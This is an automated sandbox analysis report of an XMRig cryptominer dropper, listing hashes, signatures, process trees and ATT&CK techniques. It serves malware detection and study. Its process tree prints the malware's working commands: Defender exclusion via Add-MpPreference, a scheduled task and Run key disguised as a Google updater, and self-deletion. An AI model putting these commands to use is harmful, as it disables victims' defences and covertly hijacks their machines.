Resubmissions

25-01-2024 16:55

240125-vfcyksbhgr 10

24-01-2024 17:15

240124-vstf4aecaj 10

23-01-2024 19:27

240123-x6cfvagbd9 10

23-01-2024 19:27

240123-x6bvbafgem 10

23-01-2024 19:27

240123-x6bjjsgbd8 10

23-01-2024 19:27

240123-x6ax1sfgek 10

23-01-2024 19:27

240123-x6abgsfgej 10

23-01-2024 19:27

240123-x591qagbd7 10

23-01-2024 19:27

240123-x59d7agbd6 10

23-01-2024 19:27

240123-x584esgbd5 10

Analysis

  • max time kernel
    1446s
  • max time network
    1790s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    23-01-2024 19:27

General

  • Target

    grhsghsGHswgh/6vHkJ4UErTSS5ECD.exe

  • Size

    2.0MB

  • MD5

    a16a669a09bf158058b83e04e69fe38e

  • SHA1

    f6c94763850d9e590d86057139e8895a7aacdeea

  • SHA256

    cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

  • SHA512

    658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

  • SSDEEP

    49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 29 IoCs
  • Deletes itself 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • UPX packed file 30 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 5 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 25 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 31 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1208
      • C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\6vHkJ4UErTSS5ECD.exe
        "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\6vHkJ4UErTSS5ECD.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:2652
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2420
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2704
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
          3⤵
          • Creates scheduled task(s)
          PID:2620
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\6vHkJ4UErTSS5ECD.exe"
        2⤵
        • Deletes itself
        • Suspicious use of WriteProcessMemory
        PID:2604
        • C:\Windows\System32\choice.exe
          choice /C Y /N /D Y /T 3
          3⤵
            PID:2556
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
          2⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2588
          • C:\Windows\system32\schtasks.exe
            "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
            3⤵
              PID:540
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
            2⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1804
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
            2⤵
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1500
            • C:\Windows\system32\schtasks.exe
              "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
              3⤵
              • Creates scheduled task(s)
              PID:1628
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe qtdiqnkejoz
            2⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Suspicious behavior: EnumeratesProcesses
            PID:1608
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
            2⤵
            • Drops file in Program Files directory
            PID:1756
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
            2⤵
            • Drops file in Program Files directory
            • Suspicious use of WriteProcessMemory
            PID:1520
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic PATH Win32_VideoController GET Name, VideoProcessor
              3⤵
              • Detects videocard installed
              • Modifies data under HKEY_USERS
              • Suspicious use of AdjustPrivilegeToken
              PID:2180
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz
            2⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2284
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {75763AF9-AD95-41E3-B181-47595FD2669B} S-1-5-18:NT AUTHORITY\System:Service:
          1⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:2868
          • C:\Program Files\Google\Chrome\updater.exe
            "C:\Program Files\Google\Chrome\updater.exe"
            2⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:440

        Network

        MITRE ATT&CK Matrix ATT&CK v13

        Execution

        Scheduled Task/Job

        1
        T1053

        Persistence

        Scheduled Task/Job

        1
        T1053

        Privilege Escalation

        Scheduled Task/Job

        1
        T1053

        Discovery

        System Information Discovery

        1
        T1082

        Query Registry

        1
        T1012

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Program Files\Google\Libs\g.log
          Filesize

          198B

          MD5

          37dd19b2be4fa7635ad6a2f3238c4af1

          SHA1

          e5b2c034636b434faee84e82e3bce3a3d3561943

          SHA256

          8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07

          SHA512

          86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
          Filesize

          7KB

          MD5

          372d75dd853ca66c5f2bc00ab357aeb1

          SHA1

          7f29407bcf2057344599c764c1efa8539373997c

          SHA256

          2b9bcab0843042d5a4adcdd1da18c22cb71895ec383be8cd22cf6c5044a54d41

          SHA512

          5350db3e3c14912cdd11986b0bf486355c28b3a7686e7ba597d8ff1115913a4961d8b264340b1dfe930bb3687edd8c909cced29e3444d9fd1771567ecd139580

        • \??\PIPE\srvsvc
          MD5

          d41d8cd98f00b204e9800998ecf8427e

          SHA1

          da39a3ee5e6b4b0d3255bfef95601890afd80709

          SHA256

          e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

          SHA512

          cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

        • \Program Files\Google\Chrome\updater.exe
          Filesize

          2.0MB

          MD5

          a16a669a09bf158058b83e04e69fe38e

          SHA1

          f6c94763850d9e590d86057139e8895a7aacdeea

          SHA256

          cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

          SHA512

          658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

        • memory/440-46-0x000000013FE50000-0x0000000140061000-memory.dmp
          Filesize

          2.1MB

        • memory/440-68-0x000000013FE50000-0x0000000140061000-memory.dmp
          Filesize

          2.1MB

        • memory/440-66-0x000000013FE50000-0x0000000140061000-memory.dmp
          Filesize

          2.1MB

        • memory/1500-56-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp
          Filesize

          9.6MB

        • memory/1500-54-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp
          Filesize

          9.6MB

        • memory/1500-55-0x0000000001390000-0x0000000001410000-memory.dmp
          Filesize

          512KB

        • memory/1500-60-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp
          Filesize

          9.6MB

        • memory/1500-59-0x0000000001390000-0x0000000001410000-memory.dmp
          Filesize

          512KB

        • memory/1500-58-0x0000000001390000-0x0000000001410000-memory.dmp
          Filesize

          512KB

        • memory/1500-57-0x0000000001390000-0x0000000001410000-memory.dmp
          Filesize

          512KB

        • memory/1608-79-0x0000000140000000-0x0000000140016000-memory.dmp
          Filesize

          88KB

        • memory/1608-73-0x0000000140000000-0x0000000140016000-memory.dmp
          Filesize

          88KB

        • memory/1804-51-0x00000000010C0000-0x0000000001140000-memory.dmp
          Filesize

          512KB

        • memory/1804-50-0x00000000010C0000-0x0000000001140000-memory.dmp
          Filesize

          512KB

        • memory/1804-49-0x000007FEF4AE0000-0x000007FEF547D000-memory.dmp
          Filesize

          9.6MB

        • memory/1804-48-0x00000000010C0000-0x0000000001140000-memory.dmp
          Filesize

          512KB

        • memory/1804-47-0x000007FEF4AE0000-0x000007FEF547D000-memory.dmp
          Filesize

          9.6MB

        • memory/1804-52-0x000007FEF4AE0000-0x000007FEF547D000-memory.dmp
          Filesize

          9.6MB

        • memory/2284-91-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2284-101-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2284-141-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2284-139-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2284-137-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2284-135-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2284-133-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2284-131-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2284-129-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2284-127-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2284-125-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2284-123-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2284-121-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2284-114-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2284-107-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2284-105-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2284-103-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2284-99-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2284-97-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2284-95-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2284-93-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2284-89-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2284-87-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2284-85-0x0000000000C10000-0x0000000000C30000-memory.dmp
          Filesize

          128KB

        • memory/2284-69-0x00000000000F0000-0x0000000000110000-memory.dmp
          Filesize

          128KB

        • memory/2284-84-0x00000000007C0000-0x00000000007E0000-memory.dmp
          Filesize

          128KB

        • memory/2284-70-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2284-71-0x00000000007C0000-0x00000000007E0000-memory.dmp
          Filesize

          128KB

        • memory/2284-72-0x0000000000C10000-0x0000000000C30000-memory.dmp
          Filesize

          128KB

        • memory/2284-83-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2284-74-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2284-76-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2284-78-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2284-82-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2284-80-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2420-12-0x00000000025A0000-0x0000000002620000-memory.dmp
          Filesize

          512KB

        • memory/2420-10-0x00000000025A0000-0x0000000002620000-memory.dmp
          Filesize

          512KB

        • memory/2420-13-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp
          Filesize

          9.6MB

        • memory/2420-8-0x00000000025A0000-0x0000000002620000-memory.dmp
          Filesize

          512KB

        • memory/2420-7-0x00000000025A0000-0x0000000002620000-memory.dmp
          Filesize

          512KB

        • memory/2420-5-0x000000001B1B0000-0x000000001B492000-memory.dmp
          Filesize

          2.9MB

        • memory/2420-6-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp
          Filesize

          9.6MB

        • memory/2420-11-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp
          Filesize

          9.6MB

        • memory/2420-9-0x0000000002320000-0x0000000002328000-memory.dmp
          Filesize

          32KB

        • memory/2588-36-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp
          Filesize

          9.6MB

        • memory/2588-37-0x0000000002540000-0x00000000025C0000-memory.dmp
          Filesize

          512KB

        • memory/2588-38-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp
          Filesize

          9.6MB

        • memory/2588-40-0x0000000002540000-0x00000000025C0000-memory.dmp
          Filesize

          512KB

        • memory/2588-39-0x0000000002540000-0x00000000025C0000-memory.dmp
          Filesize

          512KB

        • memory/2588-41-0x0000000002540000-0x00000000025C0000-memory.dmp
          Filesize

          512KB

        • memory/2588-42-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp
          Filesize

          9.6MB

        • memory/2652-0-0x000000013F6C0000-0x000000013F8D1000-memory.dmp
          Filesize

          2.1MB

        • memory/2652-23-0x000000013F6C0000-0x000000013F8D1000-memory.dmp
          Filesize

          2.1MB

        • memory/2652-29-0x000000013F6C0000-0x000000013F8D1000-memory.dmp
          Filesize

          2.1MB

        • memory/2704-21-0x000007FEF4AE0000-0x000007FEF547D000-memory.dmp
          Filesize

          9.6MB

        • memory/2704-27-0x000007FEF4AE0000-0x000007FEF547D000-memory.dmp
          Filesize

          9.6MB

        • memory/2704-26-0x00000000023A0000-0x0000000002420000-memory.dmp
          Filesize

          512KB

        • memory/2704-25-0x00000000023A0000-0x0000000002420000-memory.dmp
          Filesize

          512KB

        • memory/2704-24-0x000007FEF4AE0000-0x000007FEF547D000-memory.dmp
          Filesize

          9.6MB

        • memory/2704-20-0x0000000002260000-0x0000000002268000-memory.dmp
          Filesize

          32KB

        • memory/2704-22-0x00000000023A0000-0x0000000002420000-memory.dmp
          Filesize

          512KB

        • memory/2704-19-0x000000001B0F0000-0x000000001B3D2000-memory.dmp
          Filesize

          2.9MB